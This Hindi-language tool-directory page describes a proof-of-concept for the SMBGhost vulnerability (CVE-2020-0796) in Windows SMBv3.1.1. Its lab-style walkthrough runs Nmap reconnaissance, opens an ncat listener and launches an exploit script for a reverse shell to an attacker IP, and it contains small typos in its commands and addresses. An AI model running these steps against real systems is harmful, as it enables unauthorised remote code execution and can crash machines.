Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hungdnvp/poc-cve-2020-0796
टोहीभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

CVE-2020-0796 (SMBGhost) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Windows 10/Server SMBv3.1.1 को लक्षित करता है। इसमें Nmap टोही, भेद्यता स्कैनिंग और रिवर्स शेल पेलोड वितरण शामिल है।

रिपॉजिटरी देखें
132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

**- प्रभावित संस्करण*

- Windows 10 संस्करण 1903 32-बिट सिस्टम के लिए

- Windows 10 संस्करण 1903 ARM64-आधारित सिस्टम के लिए

- Windows 10 संस्करण 1903 x64-आधारित सिस्टम के लिए

- Windows 10 संस्करण 1909 32-बिट सिस्टम के लिए

- Windows 10 संस्करण 1909 ARM64-आधारित सिस्टम के लिए

- Windows 10 संस्करण 1909 x64-आधारित सिस्टम के लिए

- Windows सर्वर, संस्करण 1903 (सर्वर कोर स्थापना)

- Windows सर्वर, संस्करण 1909 (सर्वर कोर स्थापना)

सिस्टम कनेक्शन आरेख

image-20240223154022321

लक्ष्य की टोह लेना

DMZ क्षेत्र में नेटवर्क रेंज स्कैन करने के लिए Nmap लॉन्च करें

map -sS 192.168.116.0/24

nmap: नेटवर्क स्कैनिंग प्रोग्राम का नाम है**.**

-sS: TCP SYN स्कैन विधि चुनता है। इस स्कैन में, Nmap लक्ष्य होस्ट को एक SYN पैकेट भेजता है और प्रतिक्रिया देखता है। यदि लक्ष्य होस्ट SYN-ACK पैकेट के साथ उत्तर देता है, तो Nmap को पता चलता है कि पोर्ट खुला है। यदि लक्ष्य होस्ट RST पैकेट के साथ उत्तर देता है, तो इसका मतलब है कि पोर्ट बंद है।

-192.168.116.0/24: IP पता या विशिष्ट IP पता श्रेणी जिसे आप स्कैन करना चाहते हैं। इस मामले में, पता श्रेणी 192.168.116.0/24 है, जो 192.168.116.1 से 192.168.116.254 तक सभी IP पतों का वर्णन करती है।

image-scanNmap

=> देखा गया कि पीड़ित मशीन का IP पता 192.116.145 पोर्ट 445 खुला है।

· पीड़ित मशीन पर कमजोरियों को स्कैन करने के लिए Nmap का उपयोग करें

map -p445 –script smb-protocols 192.168.116.145

nmap: नेटवर्क स्कैनिंग प्रोग्राम का नाम है।

-p445: स्कैन करने के लिए विशिष्ट पोर्ट निर्दिष्ट करता है, इस मामले में पोर्ट 445। पोर्ट 445 का उपयोग आमतौर पर Windows सिस्टम पर SMB (सर्वर मैसेज ब्लॉक) सेवा के साथ संचार करने के लिए किया जाता है।

--script smb-protocols: स्कैन करने के लिए स्क्रिप्ट smb-protocols का चयन करता है। यह स्क्रिप्ट लक्ष्य सर्वर पर समर्थित SMB प्रोटोकॉल संस्करणों के बारे में जानकारी की जाँच और प्रदर्शित करने में मदद करती है।

192.168.116.145: उस सर्वर का IP पता जिसे आप स्कैन करना चाहते हैं। इस मामले में, IP पता 192.168.116.145 सेट किया गया है।

image-sanNmap2

  • प्राप्त परिणाम smb-protocols पीड़ित मशीन में संभावित कमजोरी है जो SMBv3.1.1 का शोषण कर सकती है।

  • अधिक निश्चितता के लिए, पायथन स्क्रिप्ट चलाकर CVE-2020-0796 कमजोरी के शोषण की संभावना की जाँच करें।

[]: -https://github.com/ly4k/SMBGhost "मैलवेयर कोड"

image-nmapcheck

=> परिणाम असुरक्षित -> पीड़ित मशीन पर CVE-2020-0796 कमजोरी के शोषण की संभावना पाई गई।

कमजोरी का शोषण, मैलवेयर स्थापित करना, रिमोट कंट्रोल चैनल बनाना

**रिवर्स शेल हमला शुरू करें**

  • Netcat का उपयोग करके सत्र शुरू करें जो पीड़ित से कनेक्शन सुनता है*
ncat -lvp 4444
  • CVE-2020-0796 शोषण स्क्रिप्ट लॉन्च करें

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "मैलवेयर कोड"

python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444

image-attack

=> परिणाम: हमलावर मशीन पीड़ित मशीन पर शेल कोड निष्पादित करने का अधिकार प्राप्त कर लेती है।

image-result

सफल कनेक्शन के बाद, हमलावर पीड़ित मशीन पर सत्र में उपयोगकर्ता के उपयोगकर्ता अधिकारों के साथ मनमाना कोड का शोषण और निष्पादन कर सकता है।

सत्र समाप्त होने पर। पीड़ित मशीन ब्लू स्क्रीन त्रुटि और स्वचालित पुनरारंभ से ग्रस्त हो जाती है।

image-end

*शोषण करने से लक्षित सिस्टम को नुकसान हो सकता है*

टूल डाउनलोड करें